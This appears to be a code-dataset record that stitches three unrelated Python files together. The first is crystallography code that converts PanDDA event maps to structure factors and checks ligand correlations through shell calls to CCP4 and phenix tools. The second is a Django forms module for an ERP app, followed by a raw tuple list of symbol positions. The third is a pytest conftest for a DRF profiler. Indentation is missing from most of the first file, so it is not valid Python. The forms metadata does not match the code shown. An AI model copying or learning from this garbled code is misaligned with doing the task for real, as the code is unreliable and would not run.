def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
        # remove existing mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
        # event maps generated with pandda v0.2 or higher have the same symmetry as the crystal,
        # but phenix.map_to_structure_factors only accepts maps in spacegroup P1;
        # therefore the map is first expanded to the full unit cell and its spacegroup is then set to P1.
        # other conversion options like cinvfft give, for whatever reason, uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
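        # prefer refmac-style FWT/PHWT map coefficients, otherwise fall back to phenix-style 2FOFCWT/PH2FOFCWT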
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
' RESOLUTION %s\n' %self.resolution+
' END\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
        cmd = ( '#!'+os.getenv('SHELL')+'\n'
                '\n'
                'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
                'xyzlim cell\n'
                'symmetry p1\n'
                'eof\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
            if float(self.resolution) < 1.21: # phenix.map_to_structure_factors complains if d_min is 1.2 A or better
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
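        # NOTE: several of these names look stale; prepare_conversion_script() writes mask_ligand.*,
        # onecell_event_map.map and masked_event_map*.map instead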
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
            pdb_extract_init += os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
        self.Logfile.insert('changing to '+self.panddaDir)
progress_step=1
        dataset_dirs = glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))
        if len(dataset_dirs) != 0:
            progress_step=100/float(len(dataset_dirs))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
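        # NOTE: the assembled row is only printed here; the actual insert into panddaTable appears to be left unimplemented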
        print(xtal, db_dict)
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
                # now need to check if there is an unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
                try:
                    import gemmi  # the import in __init__ is local to that method, so import again here
                    p = gemmi.read_structure('refine.pdb')
                except Exception:
                    self.Logfile.error('gemmi library not available or refine.pdb unreadable')
                    self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | [] |
OMAR-EHAB777/FerpMenu | OmegaErp/Apps/base/forms/__init__.py | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
def clean(self):
super().clean()
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
        if password1 != password2:
            raise forms.ValidationError(
                _('The two password fields didn\'t match.')
            )
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | [((194, 18, 194, 75), 'django.forms.CharField', 'forms.CharField', (), '', False, 'from django import forms\n'), ((195, 16, 195, 60), 'django.forms.IntegerField', 'forms.IntegerField', (), '', False, 'from django import forms\n'), ((32, 26, 32, 35), 'django.utils.translation.ugettext_lazy', '_', ({(32, 28, 32, 34): '"""Name"""'}, {}), "('Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((33, 25, 33, 39), 'django.utils.translation.ugettext_lazy', '_', ({(33, 27, 33, 38): '"""Last Name"""'}, {}), "('Last Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((34, 23, 34, 40), 'django.utils.translation.ugettext_lazy', '_', ({(34, 25, 34, 39): '"""Mobile Phone"""'}, {}), "('Mobile Phone')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((37, 26, 37, 74), 'django.forms.TextInput', 'forms.TextInput', (), '', False, 'from django import forms\n'), ((38, 25, 38, 73), 'django.forms.TextInput', 'forms.TextInput', (), '', False, 'from django import forms\n'), ((39, 23, 39, 71), 'django.forms.TextInput', 'forms.TextInput', (), '', False, 'from django import forms\n'), ((160, 20, 160, 37), 'django.utils.translation.ugettext_lazy', '_', ({(160, 22, 160, 36): '"""Company Name"""'}, {}), "('Company Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((161, 23, 161, 35), 'django.utils.translation.ugettext_lazy', '_', ({(161, 25, 161, 34): '"""Country"""'}, {}), "('Country')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((162, 21, 162, 42), 'django.utils.translation.ugettext_lazy', '_', ({(162, 23, 162, 41): '"""Admin user email"""'}, {}), "('Admin user email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((163, 24, 163, 37), 'django.utils.translation.ugettext_lazy', '_', ({(163, 26, 163, 36): '"""Password"""'}, {}), "('Password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((98, 16, 98, 59), 'django.utils.translation.ugettext_lazy', '_', ({(98, 18, 98, 58): '"""The two password fields didn\'t match."""'}, {}), '("The two password fields didn\'t match.")', True, 'from django.utils.translation import ugettext_lazy as _\n'), ((102, 16, 102, 59), 'django.utils.translation.ugettext_lazy', '_', ({(102, 18, 102, 58): '"""The two password fields didn\'t match."""'}, {}), '("The two password fields didn\'t match.")', True, 'from django.utils.translation import ugettext_lazy as _\n'), ((71, 63, 71, 73), 'django.utils.translation.ugettext_lazy', '_', ({(71, 65, 71, 72): '"""Email"""'}, {}), "('Email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((82, 59, 82, 72), 'django.utils.translation.ugettext_lazy', '_', ({(82, 61, 82, 71): '"""Password"""'}, {}), "('Password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((87, 59, 87, 79), 'django.utils.translation.ugettext_lazy', '_', ({(87, 61, 87, 78): '"""Retype password"""'}, {}), "('Retype password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((117, 63, 117, 73), 'django.utils.translation.ugettext_lazy', '_', ({(117, 65, 117, 72): '"""Email"""'}, {}), "('Email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((138, 31, 138, 47), 'django.utils.translation.ugettext_lazy', '_', ({(138, 33, 138, 46): '"""Admin email"""'}, {}), "('Admin email')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((146, 31, 146, 50), 'django.utils.translation.ugettext_lazy', '_', ({(146, 33, 146, 49): '"""Admin Password"""'}, {}), "('Admin Password')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((169, 40, 169, 57), 'django.utils.translation.ugettext_lazy', '_', ({(169, 42, 169, 56): '"""Company Name"""'}, {}), "('Company Name')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((177, 40, 177, 64), 'django.utils.translation.ugettext_lazy', '_', ({(177, 42, 177, 63): '"""Select a country..."""'}, {}), "('Select a country...')", True, 'from django.utils.translation import ugettext_lazy as _\n'), ((184, 40, 184, 61), 'django.utils.translation.ugettext_lazy', '_', ({(184, 42, 184, 60): '"""Admin user email"""'}, {}), "('Admin user email')", True, 'from django.utils.translation import ugettext_lazy as _\n')]
fvlima/drf-view-profiler | test-drf-project/tests/conftest.py | a61d48e9835679f812d69d24ea740b947836108c | from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
